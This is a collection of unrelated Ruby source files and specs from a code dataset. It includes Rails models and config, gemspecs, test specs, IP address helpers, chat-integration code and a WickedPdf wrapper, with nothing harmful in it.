# @option attributes [String] :compartment_id The value to assign to the {#compartment_id} property
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
self.compartment_id = attributes[:'compartmentId'] if attributes[:'compartmentId']
raise 'You cannot provide both :compartmentId and :compartment_id' if attributes.key?(:'compartmentId') && attributes.key?(:'compartment_id')
self.compartment_id = attributes[:'compartment_id'] if attributes[:'compartment_id']
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# Checks equality by comparing each attribute.
# @param [Object] other the other object to be compared
def ==(other)
return true if equal?(other)
self.class == other.class &&
compartment_id == other.compartment_id
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# @see the `==` method
# @param [Object] other the other object to be compared
def eql?(other)
self == other
end
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[compartment_id].hash
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /^Array<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
public_method("#{key}=").call(
attributes[self.class.attribute_map[key]]
.map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) }
)
end
elsif !attributes[self.class.attribute_map[key]].nil?
public_method("#{key}=").call(
OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]])
)
end
# or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = public_method(attr).call
next if value.nil? && !instance_variable_defined?("@#{attr}")
hash[param] = _to_hash(value)
end
hash
end
private
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
# rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
| 37.205128 | 367 | 0.685734 |
399526a660f989217b9b31d872304daa5c2d1ebc | 225 | class Game < ActiveRecord::Base
belongs_to :category
self.primary_key = "sku"
validates :name, presence: true
validates :english_description, presence: true
validates :portuguese_description, presence: true
end
| 25 | 52 | 0.764444 |
ed62a600ab78ba9b3bd5963b12569ceccaf7b4b8 | 925 | Pod::Spec.new do |s|
s.name = 'CSS3ColorsSwift'
s.version = '1.1.5'
s.summary = 'A UIColor extension for Web Color.'
s.description = <<-DESC
CSS3ColorsSwift provides a UIColor extension with Web Color names.
DESC
s.homepage = 'https://github.com/WorldDownTown/CSS3ColorsSwift'
s.screenshots = 'https://github.com/WorldDownTown/CSS3ColorsSwift/raw/master/images/screenshot.png'
s.license = { type: 'MIT', file: 'LICENSE' }
s.author = { 'WorldDownTown' => '[email protected]' }
s.social_media_url = 'https://twitter.com/WorldDownTown'
s.platform = :ios
s.platform = :ios, '9.0'
s.source = { git: 'https://github.com/WorldDownTown/CSS3ColorsSwift.git', tag: s.version.to_s }
s.source_files = 'CSS3ColorsSwift/*.swift'
s.framework = 'UIKit'
end
| 48.684211 | 107 | 0.593514 |
d506a765c90b6d0bc9601bc8bf43713935408bc4 | 1,836 | describe MiqDecorator do
context ".for" do
it "returns nil when a class doesn't have a decorator" do
class TestClassWithout1
end
expect(MiqDecorator.for(TestClassWithout1)).to eq(nil)
end
it "correctly decorates a class when a decorator exists" do
class TestClass2
end
class TestClass2Decorator < MiqDecorator
end
expect(MiqDecorator.for(TestClass2)).to eq(TestClass2Decorator)
end
it "correctly decorates a namespaced class" do
module TestModule3
class TestClass3
end
class TestClass3Decorator < MiqDecorator
end
end
expect(MiqDecorator.for(TestModule3::TestClass3)).to eq(TestModule3::TestClass3Decorator)
end
it "correctly doesn't decorate a namespaced class" do
module TestModule4
class TestClass4
end
end
class TestClass4Decorator < MiqDecorator
end
expect(MiqDecorator.for(TestModule4::TestClass4)).not_to eq(TestClass4Decorator)
expect(MiqDecorator.for(TestModule4::TestClass4)).to eq(nil)
end
it "correctly decorates a class when only a decorator for the superclass" do
class TestParent5
end
class TestClass5 < TestParent5
end
class TestParent5Decorator < MiqDecorator
end
expect(MiqDecorator.for(TestClass5)).to eq(TestParent5Decorator)
end
it "correctly decorates an instance" do
class TestClass6
extend MiqDecorator::Klass
include MiqDecorator::Instance
attr_reader :x
def initialize(x)
@x = x
end
end
class TestClass6Decorator < MiqDecorator
def foo
x + 1
end
end
instance = TestClass6.new(123)
expect(instance.decorate.foo).to eq(124)
end
end
end
| 22.390244 | 95 | 0.654684 |
392c41120f6c19c4680a8237847f482e018348fc | 826 | # frozen_string_literal: true
module EE
module Gitlab
module Ci
module Parsers
extend ActiveSupport::Concern
class_methods do
def parsers
super.merge({
license_management: ::Gitlab::Ci::Parsers::LicenseCompliance::LicenseScanning,
license_scanning: ::Gitlab::Ci::Parsers::LicenseCompliance::LicenseScanning,
dependency_scanning: ::Gitlab::Ci::Parsers::Security::DependencyScanning,
container_scanning: ::Gitlab::Ci::Parsers::Security::ContainerScanning,
dast: ::Gitlab::Ci::Parsers::Security::Dast,
sast: ::Gitlab::Ci::Parsers::Security::Sast,
metrics: ::Gitlab::Ci::Parsers::Metrics::Generic
})
end
end
end
end
end
end
| 31.769231 | 94 | 0.59201 |
18d2fa8437a08816b489a7335f25a99afdfac42c | 529 | # A user who is assigned to a task
class TaskOwner < ActiveRecord::Base
belongs_to :user
belongs_to :task#, :touch => true
named_scope :unread, :conditions => { :unread => true }
# touch currently calls validations, which fail when creating from email, so update manually
# see https://rails.lighthouseapp.com/projects/8994/tickets/2520-patch-activerecordtouch-without-validations
after_save :touch_task
private
def touch_task
self.task.update_attributes(:updated_at => Time.now) if self.task
end
end
| 27.842105 | 110 | 0.746692 |
1a62349cfc24376d283c765aaec932fa8c992229 | 405 | require 'talltorp_foodie'
describe TalltorpFoodie::Foodie do
it "broccoli is gross" do
expect(TalltorpFoodie::Foodie.portray("Broccoli")).to eql("Gross!")
end
it "anything else is delicious" do
expect(TalltorpFoodie::Foodie.portray("Not Broccoli")).to eql("Delicious!")
end
it "pluralizes a word" do
expect(TalltorpFoodie::Foodie.pluralize("Tomatoe")).to eql("Tomatoes")
end
end | 27 | 79 | 0.723457 |
e9e855ebb2b2bfea79c380a6ffae0f9b1f9f9cd8 | 433 | #!/home/software/ruby-1.8.7/bin/ruby -w
require 'rvg/rvg'
rvg = Magick::RVG.new(200, 100) do |canvas|
canvas.background_fill = 'white'
canvas.rect(150, 50, 25, 25).round(6).
styles(:fill=>'none', :stroke=>'purple', :stroke_width=>10, :stroke_dasharray=>[10,5])
canvas.rect(199, 99).styles(:fill=>'none', :stroke=>'blue')
end
rvg.draw.write('rvg_stroke_dasharray.gif')
| 33.307692 | 106 | 0.591224 |
61c2a09ced1ee8458599b48f640730843e1765c7 | 1,834 | require_relative "lib/shopify_cli/version"
Gem::Specification.new do |spec|
spec.name = "shopify-cli"
spec.version = ShopifyCLI::VERSION
spec.authors = ["Shopify"]
spec.email = ["[email protected]"]
spec.license = "MIT"
spec.summary = "Shopify CLI helps you build Shopify apps faster."
spec.description = <<~HERE
Shopify CLI helps you build Shopify apps faster. It quickly scaffolds Node.js
and Ruby on Rails embedded apps. It also automates many common tasks in the
development process and lets you quickly add popular features, such as billing
and webhooks.
HERE
spec.homepage = "https://shopify.github.io/shopify-cli/"
spec.required_ruby_version = Gem::Requirement.new(">= 2.6")
spec.metadata["allowed_push_host"] = "https://rubygems.org"
spec.metadata["homepage_uri"] = spec.homepage
spec.metadata["source_code_uri"] = "https://github.com/Shopify/shopify-cli"
spec.metadata["changelog_uri"] = "https://github.com/Shopify/shopify-cli/blob/main/CHANGELOG.md"
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path("..", __FILE__)) do
%x(git ls-files -z).split("\x0").reject do |f|
f.match(%r{^(test|spec|features|packaging)/}) ||
f.match(%r{^bin/(update-deps|shopify.bat)$})
end
end
spec.bindir = "bin"
spec.require_paths = ["lib", "vendor"]
spec.executables << "shopify"
spec.add_development_dependency("bundler", "~> 2.2.2")
spec.add_development_dependency("rake", "~> 12.3", ">= 12.3.3")
spec.add_development_dependency("minitest", "~> 5.0")
spec.add_dependency("bugsnag", "~> 6.22")
spec.add_dependency("listen", "~> 3.7.0")
spec.add_dependency("theme-check", "~> 1.7.2")
end
| 39.869565 | 98 | 0.696838 |
28b0bd1d2db35545c3c0ae44407337521f967278 | 5,692 | # $Id: misc.rb 14 2008-03-02 05:42:30Z warchild $
#
# Copyright (c) 2008, Jon Hart
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the <organization> nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY Jon Hart ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL Jon Hart BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
require 'ipaddr'
module Racket
module L3
# Miscelaneous L3 helper methods
module Misc
# given an IPv4 address packed as an integer
# return the friendly "dotted quad"
def Misc.long2ipv4(long)
quad = Array.new(4)
quad[0] = (long >> 24) & 255
quad[1] = (long >> 16) & 255
quad[2] = (long >> 8 ) & 255
quad[3] = long & 255
quad.join(".")
end
def Misc.randomipv4
Misc.long2ipv4(rand(2**32))
end
# Compute link local address for a given mac address
# From Daniele Bellucci
def Misc.linklocaladdr(mac)
mac = mac.split(":")
mac[0] = (mac[0].to_i(16) ^ (1 << 1)).to_s(16)
["fe80", "", mac[0,2].join, mac[2,2].join("ff:fe"), mac[4,2].join].join(":")
end
# Given a long, convert it to an IPv6 address,
# optionally compressing the address returned
def Misc.long2ipv6(long, compress=true)
ipv6 = []
ipv6[0] = long >> 112
ipv6[1] = (long >> 96) & (0xFFFF)
ipv6[2] = (long >> 80) & (0xFFFF)
ipv6[3] = (long >> 64) & (0xFFFF)
ipv6[4] = (long >> 48) & (0xFFFF)
ipv6[5] = (long >> 32) & (0xFFFF)
ipv6[6] = (long >> 16) & (0xFFFF)
ipv6[7] = long & (0xFFFF)
ipv6 = ipv6.map { |o| o.to_s(16) }.join(":")
compress ? Misc.compressipv6(ipv6) : ipv6
end
# Compress an IPv6 address
# Inspired by Daniele Bellucci and jacked from ipaddr
def Misc.compressipv6(ipv6)
ipv6.gsub!(/\b0{1,3}([\da-f]+)\b/i, '\1')
loop do
break if ipv6.sub!(/\A0:0:0:0:0:0:0:0\Z/, '::')
break if ipv6.sub!(/\b0:0:0:0:0:0:0\b/, ':')
break if ipv6.sub!(/\b0:0:0:0:0:0\b/, ':')
break if ipv6.sub!(/\b0:0:0:0:0\b/, ':')
break if ipv6.sub!(/\b0:0:0:0\b/, ':')
break if ipv6.sub!(/\b0:0:0\b/, ':')
break if ipv6.sub!(/\b0:0\b/, ':')
break
end
ipv6.sub!(/:{3,}/, '::')
if /\A::(ffff:)?([\da-f]{1,4}):([\da-f]{1,4})\Z/i =~ ipv6
ipv6 = sprintf('::%s%d.%d.%d.%d', $1, $2.hex / 256, $2.hex % 256, $3.hex / 256, $3.hex % 256)
end
ipv6
end
def Misc.randomipv6
Misc.long2ipv6(rand(2**128))
end
# given a string representing an IPv6
# address, return the integer representation
def Misc.ipv62long(ip)
IPAddr.new(ip).to_i
end
# In addition to the regular multicast addresses, each unicast address
# has a special multicast address called its solicited-node address. This
# address is created through a special mapping from the device’s unicast
# address. Solicited-node addresses are used by the IPv6 Neighbor
# Discovery (ND) protocol to provide more efficient address resolution
# than the ARP technique used in IPv4.
# From Daniele Bellucci
def Misc.soll_mcast_addr6(addr)
h = addr.split(':')[-2, 2]
m = []
m << 'ff'
m << (h[0].to_i(16) & 0xff).to_s(16)
m << ((h[1].to_i(16) & (0xff << 8)) >> 8).to_s(16)
m << (h[1].to_i(16) & 0xff).to_s(16)
'ff02::1:' + [m[0,2].join, m[2,2].join].join(':')
end
#
def Misc.soll_mcast_mac(addr)
h = addr.split(':')[-2, 2]
m = []
m << 'ff'
m << (h[0].to_i(16) & 0xff).to_s(16)
m << ((h[1].to_i(16) & (0xff << 8)) >> 8).to_s(16)
m << (h[1].to_i(16) & 0xff).to_s(16)
'33:33:' + m.join(':')
end
# given a "dotted quad" representing an IPv4
# address, return the integer representation
def Misc.ipv42long(ip)
IPAddr.new(ip).to_i
end
# Calculate the checksum. 16 bit one's complement of the one's
# complement sum of all 16 bit words
def Misc.checksum(data)
num_shorts = data.length / 2
checksum = 0
count = data.length
data.unpack("S#{num_shorts}").each { |x|
checksum += x
count -= 2
}
if (count == 1)
checksum += data[data.length - 1, 1].unpack('C')[0]
end
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum = ~((checksum >> 16) + checksum) & 0xffff
([checksum].pack("S*")).unpack("n*")[0]
end
end
end
end
# vim: set ts=2 et sw=2:
| 34.083832 | 101 | 0.601195 |
617b490fecd2253c74071cfb03225e5f26190ce6 | 70 | # -*- encoding : utf-8 -*-
module TntMercurio
VERSION = "1.0.0"
end
| 14 | 26 | 0.6 |
f7d92195112ab863459f18348aca476beb59ea13 | 3,909 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# This file is the source Rails uses to define your schema when running `rails
# db:schema:load`. When creating a new database, `rails db:schema:load` tends to
# be faster and is potentially less error prone than running all of your
# migrations from scratch. Old migrations may fail to apply correctly if those
# migrations use external dependencies or application code.
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2020_04_01_004946) do
# These are extensions that must be enabled in order to support this database
enable_extension "plpgsql"
create_table "active_storage_attachments", force: :cascade do |t|
t.string "name", null: false
t.string "record_type", null: false
t.bigint "record_id", null: false
t.bigint "blob_id", null: false
t.datetime "created_at", null: false
t.index ["blob_id"], name: "index_active_storage_attachments_on_blob_id"
t.index ["record_type", "record_id", "name", "blob_id"], name: "index_active_storage_attachments_uniqueness", unique: true
end
create_table "active_storage_blobs", force: :cascade do |t|
t.string "key", null: false
t.string "filename", null: false
t.string "content_type"
t.text "metadata"
t.bigint "byte_size", null: false
t.string "checksum", null: false
t.datetime "created_at", null: false
t.index ["key"], name: "index_active_storage_blobs_on_key", unique: true
end
create_table "contests", force: :cascade do |t|
t.string "name"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.integer "start_datetime"
t.integer "end_datetime"
end
create_table "languages", force: :cascade do |t|
t.string "name"
t.string "extension"
end
create_table "problems", force: :cascade do |t|
t.string "name"
t.text "description"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.integer "contest_id"
t.string "uuid"
t.integer "time_limit", default: 2
t.index ["contest_id"], name: "index_problems_on_contest_id"
end
create_table "submissions", force: :cascade do |t|
t.text "code"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.integer "language_id"
t.integer "problem_id"
t.integer "user_id"
t.string "message"
t.integer "score"
t.boolean "success"
t.index ["language_id"], name: "index_submissions_on_language_id"
t.index ["problem_id"], name: "index_submissions_on_problem_id"
t.index ["user_id"], name: "index_submissions_on_user_id"
end
create_table "users", force: :cascade do |t|
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.string "email", null: false
t.string "encrypted_password", limit: 128, null: false
t.string "confirmation_token", limit: 128
t.string "remember_token", limit: 128, null: false
t.integer "role"
t.string "full_name"
t.boolean "is_suspended", default: false
t.integer "last_request"
t.integer "email_confirmed_at"
t.string "email_confirmation_token"
t.index ["email"], name: "index_users_on_email"
t.index ["remember_token"], name: "index_users_on_remember_token"
end
add_foreign_key "active_storage_attachments", "active_storage_blobs", column: "blob_id"
add_foreign_key "problems", "contests"
add_foreign_key "submissions", "languages"
add_foreign_key "submissions", "problems"
add_foreign_key "submissions", "users"
end
| 38.70297 | 126 | 0.718086 |
5d731191a884273b0b6bfbe3af81809d5598866c | 1,046 |
module NeverBounce; module API; module Request
describe JobsDelete do
include_dir_context __dir__
it_behaves_like "instantiatable"
describe ".response_klass" do
it { expect(described_class.response_klass).to eq Response::JobsDelete }
end
describe "#to_httparty" do
it "generally works" do
r = newo
expect { r.to_httparty }.to raise_error(AttributeError, "Attribute must be set: job_id")
r.job_id = "123"
expect { r.to_httparty }.to raise_error(AttributeError, "Attribute must be set: api_key")
r.api_key = "api_key"
res = r.to_httparty
expect(res).to be_a Array
method, url, data = res
expect(method).to eq :post
expect(url).to eq "https://api.neverbounce.com/v4.1/jobs/delete"
expect(data).to include(:body, :headers)
expect(data.fetch(:body)).to eq("{\"job_id\":\"123\",\"key\":\"api_key\"}")
expect(data.fetch(:headers)).to include("Content-Type", "User-Agent")
end
end
end
end; end; end
| 32.6875 | 97 | 0.638623 |
79711b9910f57053f6b76a1010a6fd0c60fc5275 | 200 | require 'rails_helper'
RSpec.describe "events", type: :routing do
it "routes /upcoming to events#index" do
expect(get: "/upcoming").to route_to(controller: "events", action: "index")
end
end
| 25 | 79 | 0.71 |
33f3e6bec1b4ce411581f5d434d71f37b3a3679f | 664 | module Mulukhiya
class LineService < Ginseng::LineService
include Package
def initialize(params = {})
super rescue nil
@id = params[:id] || LineService.id
@token = (params[:token].decrypt rescue params[:token]) || LineService.token
end
def self.id
return config['/alert/line/to'] rescue nil
end
def self.token
return config['/alert/line/token'].decrypt
rescue Ginseng::ConfigError
return nil
rescue
return config['/alert/line/token']
end
def self.config?
return false unless LineService.id
return false unless LineService.token
return true
end
end
end
| 22.133333 | 82 | 0.64759 |
5da295254d86de46499526b193984e3e113b24bb | 1,787 | require_relative 'boot'
require "rails"
# Pick the frameworks you want:
require "active_model/railtie"
require "active_job/railtie"
require "active_record/railtie"
require "active_storage/engine"
require "action_controller/railtie"
require "action_mailer/railtie"
require "action_mailbox/engine"
require "action_text/engine"
require "action_view/railtie"
require "action_cable/engine"
# require "sprockets/railtie"
require "rails/test_unit/railtie"
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module App
class Application < Rails::Application
# Initialize configuration defaults for originally generated Rails version.
config.load_defaults 6.0
# Settings in config/environments/* take precedence over those specified here.
# Application configuration can go into files in config/initializers
# -- all .rb files in that directory are automatically loaded after loading
# the framework and any gems in your application.
# Only loads a smaller set of middleware suitable for API only apps.
# Middleware like session, flash, cookies can be added back manually.
# Skip views, helpers and assets when generating a new resource.
config.api_only = true
# NOTE:
# development.rb に config.hosts << ".hibriiiidge.com" を書けば成功するが、
# production.rb だと失敗する
# To allow requests to app, add the following to your environment configuration:
# ここに config.hosts << ".hibriiiidge.com" でも失敗する
# config.hosts << "app"
# と思ったけど、config.hosts 自体書かなくて良さそう?
config.middleware.use ActionDispatch::Flash
config.autoload_paths += %W(#{Rails.root}/lib/sessions)
config.eager_load_paths += %W(#{Rails.root}/lib/sessions)
end
end
| 35.74 | 84 | 0.752658 |
21b07440eb711a233e99911451576f40abce0886 | 98 | class DropClassmarks < ActiveRecord::Migration
def change
drop_table :classmarks
end
end
| 14 | 46 | 0.765306 |
33318c62642068665fc8871f1b74ac797d5bfa59 | 150 | class AddHasTodoToProject < ActiveRecord::Migration
def change
add_column :projects, :has_todo, :boolean, null: false, default: false
end
end
| 25 | 74 | 0.76 |
38a19314c22b0812759cdce0bd9ab751d7694a7b | 1,560 | module Intrigue
module Task
class ImportAwsIpv4Ranges < BaseTask
include Intrigue::Task::Web
def self.metadata
{
:name => "import/aws_ipv4_ranges",
:pretty_name => "Import AWS IPv4 Ranges",
:authors => ["jcran"],
:description => "This gathers the ranges from AWS.",
:references => [],
:type => "import",
:passive => true,
:allowed_types => ["*"],
:example_entities => [
{"type" => "String", "details" => {"name" => "us-east-1"}}
],
:allowed_options => [
{:name => "service", :regex => "alpha_numeric", :default => "EC2" },
{:name => "limit", :regex => "alpha_numeric", :default => 10 },
],
:created_types => ["NetBlock"]
}
end
## Default method, subclasses must override this
def run
super
region = _get_entity_name
service = _get_option("service")
limit = _get_option("limit")
range_data = JSON.parse(http_get_body("https://ip-ranges.amazonaws.com/ip-ranges.json"))
range_data["prefixes"].each do |range|
_log "Parsing... #{range}"
limit-=1
if limit == 0
_log "Hit limit, exiting!"
return
end
next unless (region == "#{range["region"]}" || region == "*")
next unless (service == "#{range["service"]}" || service == "*")
prefix = "#{range["ipv6_prefix"]}#{range["ip_prefix"]}"
_log " -> Creating #{prefix}"
_create_entity("NetBlock", {"name" => "#{prefix}", "aws_region" => region, "aws_service" => service })
end
end
end
end
end
| 26.440678 | 108 | 0.562821 |
6a13aa81cc4d85b14991143c31c35edd4bec9140 | 260 | module MiniMagick
##
# @return [Gem::Version]
#
def self.version
Gem::Version.new VERSION::STRING
end
module VERSION
MAJOR = 4
MINOR = 0
TINY = 2
PRE = nil
STRING = [MAJOR, MINOR, TINY, PRE].compact.join('.')
end
end
| 14.444444 | 56 | 0.580769 |
915ba9735f5b5977afde0718a28dd4ff7e35c577 | 1,390 | # frozen_string_literal: true
class DeviseCreateUsers < ActiveRecord::Migration[6.0]
def change
create_table :users do |t|
## Database authenticatable
t.string :email, null: false, default: ''
t.string :encrypted_password, null: false, default: ''
## Recoverable
t.string :reset_password_token
t.datetime :reset_password_sent_at
## Rememberable
t.datetime :remember_created_at
## Trackable
t.integer :sign_in_count, default: 0, null: false
t.datetime :current_sign_in_at
t.datetime :last_sign_in_at
t.string :current_sign_in_ip
t.string :last_sign_in_ip
## Confirmable
# t.string :confirmation_token
# t.datetime :confirmed_at
# t.datetime :confirmation_sent_at
# t.string :unconfirmed_email # Only if using reconfirmable
## Lockable
# t.integer :failed_attempts, default: 0, null: false # Only if lock strategy is :failed_attempts
# t.string :unlock_token # Only if unlock strategy is :email or :both
# t.datetime :locked_at
t.timestamps null: false
end
add_index :users, :email, unique: true
add_index :users, :reset_password_token, unique: true
# add_index :users, :confirmation_token, unique: true
# add_index :users, :unlock_token, unique: true
end
end
| 31.590909 | 104 | 0.656115 |
b9fe12a53bc4d826dbffcccc0c38a765ce03e2ad | 3,112 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Ensures that a master key has been made available in either ENV["RAILS_MASTER_KEY"]
# or in config/master.key. This key is used to decrypt credentials (and other encrypted files).
# config.require_master_key = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
config.public_file_server.headers = {
'Cache-Control' => 'public, s-maxage=31536000, max-age=15552000',
'Expires' => 1.year.from_now.to_formatted_s(:rfc822)
}
# Compress JavaScripts and CSS.
config.assets.js_compressor = :uglifier
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# `config.assets.precompile` and `config.assets.version` have moved to config/initializers/assets.rb
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Use the lowest log level to ensure availability of diagnostic information
# when problems arise.
config.log_level = :debug
# Prepend all log lines with the following tags.
config.log_tags = [ :request_id ]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment)
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "docs_#{Rails.env}"
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Use a different logger for distributed setups.
# require 'syslog/logger'
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV["RAILS_LOG_TO_STDOUT"].present?
config.logger = ActiveSupport::Logger.new(STDOUT)
end
end
| 40.415584 | 102 | 0.754499 |
877584dc02724c537d9fa8bdd3750fdd5bf49a58 | 2,549 | # frozen_string_literal: true
module DiscourseChat
module Provider
module ZulipProvider
PROVIDER_NAME = "zulip".freeze
PROVIDER_ENABLED_SETTING = :chat_integration_zulip_enabled
CHANNEL_PARAMETERS = [
{ key: "stream", unique: true, regex: '^\S+' },
{ key: "subject", unique: true, regex: '^\S+' },
]
def self.send_message(message)
uri = URI("#{SiteSetting.chat_integration_zulip_server}/api/v1/messages")
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = (uri.scheme == 'https')
req = Net::HTTP::Post.new(uri)
req.basic_auth(SiteSetting.chat_integration_zulip_bot_email_address, SiteSetting.chat_integration_zulip_bot_api_key)
req.set_form_data(message)
response = http.request(req)
response
end
def self.generate_zulip_message(post, stream, subject)
display_name = "@#{post.user.username}"
full_name = post.user.name || ""
if !(full_name.strip.empty?) && (full_name.strip.gsub(' ', '_').casecmp(post.user.username) != 0) && (full_name.strip.gsub(' ', '').casecmp(post.user.username) != 0)
display_name = "#{full_name} @#{post.user.username}"
end
message = I18n.t('chat_integration.provider.zulip.message', user: display_name,
post_url: post.full_url,
title: post.topic.title,
excerpt: post.excerpt(SiteSetting.chat_integration_zulip_excerpt_length, text_entities: true, strip_links: true, remap_emoji: true))
data = {
type: 'stream',
to: stream,
subject: subject,
content: message
}
end
def self.trigger_notification(post, channel, rule)
stream = channel.data['stream']
subject = channel.data['subject']
message = self.generate_zulip_message(post, stream, subject)
response = send_message(message)
if !response.kind_of?(Net::HTTPSuccess)
error_key = nil
error_key = 'chat_integration.provider.zulip.errors.does_not_exist' if response.body.include?('does not exist')
raise ::DiscourseChat::ProviderError.new info: { error_key: error_key, message: message, response_code: response.code, response_body: response.body }
end
end
end
end
end
| 36.942029 | 200 | 0.58572 |
b92e18e394aa2b8164adca59f1aaa55a90f0906a | 1,148 | # frozen_string_literal: true
# desc "Explaining what the task does"
# task :covid_research do
# # Task goes here
# end
desc 'Rebuild encrypted-form.json when valid-intake-submission.json changes'
task rebuild_encrypted_fixture: :environment do
fixture_dir = CovidResearch::Engine.root.join('spec', 'fixtures', 'files')
submission = JSON.parse(File.read(File.join(fixture_dir, 'valid-intake-submission.json')))
formatter = CovidResearch::RedisFormat.new
formatter.form_data = JSON.generate(submission)
File.open(File.join(fixture_dir, 'encrypted-form.json'), 'w') do |f|
f.puts formatter.to_json
end
end
desc 'Rebuild encrypted-update-form.json when valid-update-submission.json changes'
task rebuild_encrypted_update_fixture: :environment do
fixture_dir = CovidResearch::Engine.root.join('spec', 'fixtures', 'files')
submission = JSON.parse(File.read(File.join(fixture_dir, 'valid-update-submission.json')))
formatter = CovidResearch::RedisFormat.new
formatter.form_data = JSON.generate(submission)
File.open(File.join(fixture_dir, 'encrypted-update-form.json'), 'w') do |f|
f.puts formatter.to_json
end
end
| 37.032258 | 92 | 0.761324 |
f89014b314842c7d28afa5323a8978045477f42a | 1,011 | # wkhtml2pdf Ruby interface
# http://code.google.com/p/wkhtmltopdf/
require 'logger'
require 'digest/md5'
require 'open3'
class WickedPdf
def initialize(wkhtmltopdf_binary_path = nil)
@exe_path = wkhtmltopdf_binary_path
@exe_path ||= WICKED_PDF[:exe_path] unless WICKED_PDF.empty?
@exe_path ||= `which wkhtmltopdf`.chomp
